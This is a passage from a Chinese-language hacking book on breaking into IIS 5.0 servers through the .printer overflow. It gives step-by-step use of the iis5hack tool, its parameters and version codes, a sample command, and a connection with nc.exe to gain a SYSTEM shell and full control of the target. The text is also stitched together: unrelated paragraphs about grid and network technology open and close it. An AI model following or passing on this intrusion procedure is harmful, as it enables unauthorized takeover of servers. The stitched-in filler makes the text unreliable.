網絡技術是從1990年代中期發展起來的新技術，它把互聯網上分散的資源融為有機整體，實現資源的全面共享和有機協作，使人們能夠透明地使用資源的整體能力并按需獲取信息。資源包括高性能計算機、存儲資源、數據資源、信息資源、知識資源、專家資源、大型數據庫、網絡、傳感器等。 當前的互聯網只限于信息共享，網絡則被認為是互聯網發展的第三階段。

6.5 Printer溢出漏洞入侵

    

6.5  Printer溢出漏洞入侵

關于printer漏洞原理，本書已在4.2.5小節 .printer漏洞修補中做了詳細的介紹，由于.printer漏洞只有IIS5.0(Windows 2000 Server)存在，所以入侵者通過此漏洞入侵計算機只會針對IIS5.0進行，下面看看入侵者是如何利用.printer漏洞對服務器進行攻擊的。

入侵者找到一臺存在有.printer漏洞的IIS5.0服務器，下載一個在Windows平臺上進行的.printer溢出程序—— iis5hack。

在命令提示符下運行iis5hack程序，如圖6-55所示。

iis5hack使用說明如下。

<Host>：溢出的主機

<HostPort>：主機的端口

<HostType>：溢出主機的類型

<ShellPort>：溢出的端口

圖6-55  IIS5hack程序運行界面

主機類型：

chinese edition: 0

chinese edition: sp1: 1      中文版IIS5.0

english edition: 2         

english edition: sp1: 3      英文版IIS5.0

japanese edition: 4

japanese edition, sp1: 5     日文版IIS5.0

korea edition: 6

korea edition, sp1: 7        朝文版IIS5.0

mexico edition: 8

mexico edition, sp1: 9      墨西哥版IIS5.0

命令行運行格式：

iis5hack 溢出主機地址 主機的端口 溢出主機的類型 溢出的端口

入侵測試：

(1) 找到一臺存有.printer漏洞的IIS5.0服務器，這里目標機的IP地址為127.0.0.1。

(2) 打開命令提示符程序，在提示符下輸入以下命令格式：

  iis5hack 127.0.0.1 80 1 3739

如圖6-56所示。

圖6-56  測試.printer溢出

提示：

iis5hack是指 .printer溢出程序，127.0.0.1為存有.printer溢出漏洞的主機，80是指主機的端口，1是指.printer溢出主機的類型為中文版，3739為溢出的端口。

 (3) 如果.printer溢出成功的話，會出現提示內容，如圖6-57所示。

圖6-57  .printer溢出成功

(4) .printer溢出成功后，iis5hack將提示：現在你可以遠程登錄到3739端口。

(5) 這時使用nc.exe程序登錄到溢出的服務器上，如圖6-58所示。

圖6-58  登錄到溢出的服務器

(6) 入侵測試成功，成功取得System的權限，如圖6-59所示。

圖6-59  入侵成功

提示：

此時入侵者完全控制了目標機，可以進行任何操作。

(7) 入侵測試完畢。

網絡的神奇作用吸引著越來越多的用戶加入其中，正因如此，網絡的承受能力也面臨著越來越嚴峻的考驗―從硬件上、軟件上、所用標準上......，各項技術都需要適時應勢，對應發展，這正是網絡迅速走向進步的催化劑。